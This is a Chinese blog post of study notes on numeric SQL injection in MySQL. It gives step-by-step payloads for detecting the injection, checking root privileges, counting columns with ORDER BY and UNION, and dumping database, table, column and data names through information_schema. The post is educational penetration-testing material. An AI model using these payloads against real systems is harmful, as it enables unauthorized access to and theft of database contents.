渗透学习笔记之基于数字型的SQL注入

最新推荐文章于 2024-06-13 11:31:30 发布
最新推荐文章于 2024-06-13 11:31:30 发布
阅读量704 收藏 5
点赞数
分类专栏: sql注入学习 文章标签: sql注入 数字型注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29853623/article/details/84938954
版权

基于数字型的SQL注入

注入流程:

1.判断SQL注入

(1) 在提交的URL后加上单引号’,
(2) and和or大法:and表示且,必须二者皆成立。or相反。
(3) 加法和减法:这目的是区分数字型和字符型的注入。

2.判断是否为root权限

(1) 目的是判断是否有root权限:and ord(mid(user(),1,1)) = 114 #114表示的是ascll的r,意即root权限。
(2) and (select count(*) from mysql.user)>0 判断是否有读写权限,当返回正确页面时表示有读写权限,反之没有。

3.判断数据库的字段数

(1) 常用两种猜解方法:
联合查询 and 1=1 union select 1,2,3,4,5 或者union select null,null,null
order by查询:order by1,2,3,4当正确时即有多少字段order by查询:order by1,2,3,4当正确时即有多少字段。
(2) 在该查询中,一般情况下程序会调用数据库查询的第一条语句进行查询然后返回。而通过联合查询时,要想查看第二条数据,则可以让第一条查询语句始终为假,这里可以用到and 1=2。反之,则为and 1=1。
(3) limit语句。该语句在mysql中是用来分页的,通过该语句可以让我们得到我们想要的数据。

4.查库名

(1) 首先查看数据库的版本:and ord(mid(version(),1,1))>51 #51指的是ascll的3
(2) 确定版本号之后联合查询:union select 1,database(),3 limit 1,1 或者union select null,scherma_name,null from information_schema.schemata 想获取第一个库名则在后面加上limit 0,1 若发现没有显示,则在第一条语句上加上:and 1=2,让第一条语句始终为假,即可查看第一个库名,依次类推可得到第二个库名,第三个库名,等等。。。

5.查表名

(1)一般而言,表名存放在数据库information_schema下的tables表中的table_name字段中,查表名主要用到的就是tables表。
(2)使用group_concat():例如在URL后加上union select null,group_concat(table_name),null from information_schema.tables where table_schema = ‘库名一’ 。或者在URL后面加上union select null,table_name,null from information_schema.tables where table_schema = ‘库名一’(这种方法比较好记忆)。

6.查字段

(1)在mysql中,字段名一般存放在information_schema数据库下的column_name字段中。
(2)查询方法:union select null,group_concat(column_name),null from information_schema.columns where table_schema = ‘库名一’ and table_name=‘表名’。或者union select null,column_name,null from information_schema.columns where table_schema = ‘库名一’ and table_name=‘表名’

7.查数据

得到库名,表名,字段名后想要获取数据的值就方便了。
(1)在URL后加上union select null,group_concat(字段名),null from 表名。或者union select 字段名 from 表名

参考文献

https://www.bugbank.cn/q/article/5983ea82cbb936102d3977bb.html

冰露寒愁
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web渗透学习路线图
weixin_39205521的博客
03-24 1061
前言 首先,你要高度热爱网络安全这个领域,你要问问自己是否是真的热爱这个行业,自己是否会因为各种了理由半途而废,放弃掉你的热爱。衡量热爱的方法特别特别地简单:看看自己主动花了多少时间在哪些事情方面,重点:『主动 + 时间』。两个条件都不能满足的,请自行将自己PASS掉,别浪费时间。其次渗透行业最注重的就是实战能力,并且知识更新较快,例如一个厂商更新了补丁就要去跟进,去掌握可能成为薄弱的渗透测试点,利用Nday作为突破。这也导致了你要有时间去搜集去跟进,各大网络软件厂商的更新内容。 渗透测试的技能点多的数不过
渗透测试学习笔记之案例二.pdf
04-06
渗透测试学习笔记
我的渗透学习实验(一)
r00tnb的博客
01-26 1062
这次的渗透实验是在i春秋的在线挑战上做的,这是第一关,以后还会继续写一些自己的渗透学习过程,就当练习后的总结吧!写的可能不好有错误,希望大家指正,还有这些只是对自己实验的记录,如果大家要学习的话还是上i春秋吧,我怕误导大家(ps:i春秋真是一个学习的好网站!另外,我还是个新手。。。。) 题目:我很简单,请不要欺负我 要求:拿到服务器的权限 由于是渗透测试入门的题目,所以漏洞就很多。但是,
sql注入的分类:数字型和字符型
qq_45627785的博客
08-05 1502
sql注入: 就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。通过构造恶意的输入,使数据库执行恶意命令,造成数据泄露或者修改内容等,以达到攻击的目的。主要是由于应用程序对用户的输入没有进行严格的过滤而造成的。 一、万能密码 在说sql注入分类之前,先来看一下万能密码的构成原理。万能密码是由于某些程序,通过采用判断sql语句查询结果的值是否大于0,来判断用户输入数据的正确性造成的。当查询之大于0时,代表用户存在,返回true,代表登录成功
渗透测试入门教程(非常详细),从零基础入门到精通,看完这一篇就够了
最新发布
xx16755498986的博客
06-13 876
渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。一定要注意的是,在进行渗透测试前,需要获得目标客户的授权,如果未获得授权,千万不要对目标系统进行渗透测试,后果请查看《网络安全法》。同时要有良好的职业操守,不能干一些违法的事情。网络安全产业就像一个江湖,各色人等聚集。
sql注入(字符型和数字型
qq_75005708的博客
04-08 2426
id=1%' and 1=1--+/#和?id=1%' and 1=2--+/#进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为。id=1' and 1=1--+/#和?id=1' and 1=2--+/#进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为。id=1 and 1=2进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为。
渗透学习笔记
莫黎小天
11-06 2295
一、SQL注入漏洞 SQL注入:web程序对用户输入数据的合法性没有判断,前端传入后端的参数可控的,并且参数带入数据库查询,攻击者可通过构造SQL语句来实现对数据库的任意操作。 1.sql注入原理 满足条件: ​ 参数用户可控:前端传入后端的内容用户可以控制 ​ 参数带入数据库查询:传入的参数拼接到SQL语句,且带入数据库查询。 原因:用户输入的数据被SQL解释器执行 2.注入漏洞分类 1)数字型注入 当输入的参数为整型时,如:ID、年龄、页码,若存在注入漏洞,则可认为是数字型 测试:
渗透基础知识入门(自学笔记
woqusss的博客
07-31 3163
渗透,要学的东西还是比较广,需要有一些基础知识作铺垫开始学,而且作为一个刚踏上学习道路不久的小伙子更应该在学习道路中不断补充更多基础知识,如编程语言,网络知识等,该篇笔记做一些基础知识的铺垫,主要围绕网络知识(域名,DNS,数据包),操作系统,数据库,Web组成架构(网站源码,操作系统,中间件,数据库),Web相关安全漏洞介绍,拓展,后门,常见的加密方式 比方说,我现在想日了某站点,那么总应该知道这个站点是哪个名字或者有什么唯一标识吧,这时候就有了IP(每一个网络和主机都会有一个逻辑地址,在交换数据
SQL学习笔记.docx
09-08
"SQL学习笔记" 本文档是关于 SQL 学习笔记的总结,涵盖了 SQL 的基本概念、函数、语法、应用场景等方面。下面是对标题、描述、标签和部分内容的详细解释: SQL 基本概念 SQL(Structured Query Language)是一种...
渗透测试学习笔记之案例三.pdf
04-06
渗透测试学习笔记
SQL字符型注入漏洞.pdf
07-18
配套博客:https://blog.csdn.net/qq_41739364/article/details/94025729
Microsoft SQL 数据库学习笔记
11-28
【Microsoft SQL 数据库学习笔记】 在数据库领域,Microsoft SQL Server 是一种广泛使用的、关系型数据库管理系统,由微软公司开发和维护。SQL(Structured Query Language)是用于管理关系数据库的标准编程语言,...
SQL注入数字型注入实战案例详解
weixin_39096432的博客
12-15 1423
SQL注入数字型注入实战案例详解 ———— 97℃oldboy SQL注入种类多种多样,此文将通过一个实例详细讲解数字型注入。 在我们拿到一个网页时,首先判断它是否存在注入漏洞最简单粗暴的方法就是在参数后面加一个单引号,如果网页报错,那么说明有可能存在注入漏洞了。请看下面的网页操作: 上面是一个正常的网页,我们先检测网页是否有参数,在网址后面加上:?id=1 即http://192.168.114.147/sqli-labs-master/Less
如何学习渗透测试:初学者教程
热门推荐
公众号:乌云安全
08-25 1万+
免责声明:黑客攻击是一项难以学习的技能。只需做一些在线课程,你就不会成为一个好的笔友。只需安装Kali Linux并学习如何使用这些工具,你就不会成为一名优秀的测试者。这是一条充满挑战的道路,无尽的挫折感,你不会在一天 - 一个月 - 甚至一年内学会如何旅行。但是,如果你有决心,你会发现它是一个非常有益的领域,你可能永远不想离开。 在本教程中,我将具体介绍 渗透测试的Web应用程序黑客攻击 方面。...
SQL手工注入——数字型注入
高毅的博客
07-01 2283
当输入的参数是整数时,若存在漏洞,则认为是数字型注入,如xxx.php?id=88形式。 这是最简单的一种注入。 测试过程一般如下: 1、对url:xxx.php?id=88后添加',形成xxx.php?id=88',观察页面是否出现异常。若系统没有做防护,则出现异常。 2、对url:xxx.php?id=88后添加and 1=1,能够正常执行,返回结果与原始请求无任何差异。 3、对ur
sql注入入门必看!一篇文章快速判断是字符型注入还是数字型注入
weixin_43919144的博客
04-16 4662
字符型注入数字型注入和的区别 我个人的理解是这两者的区别在于你所查询的数据类型不同,数据类型不同会导致你需要构造的注入的语句不同。 数字型注入 如果是数字型注入我们可以通过简单的逻辑等式判断,构造语句?id=1 and 1=1 和 ?id=1 and 1=2 。 这样构造的话我们来看看后台实际上SQL语句是怎么样的: select * from table_name where id=1 and...
Sql注入基础原理介绍(超详细)
weixin_30325487的博客
09-06 4302
一、Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。 二、Web 程序三层架构 三层架构(3-tier architecture) 通常意义上就是将整个业务应用划分为: 界面层(User Interface layer) 业务逻辑层(Business Logic...
SQL注入入门(一)——SQL注入初认识
Pz_mstr's Blog
08-13 1182
揭开SQL注入的神秘面纱

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值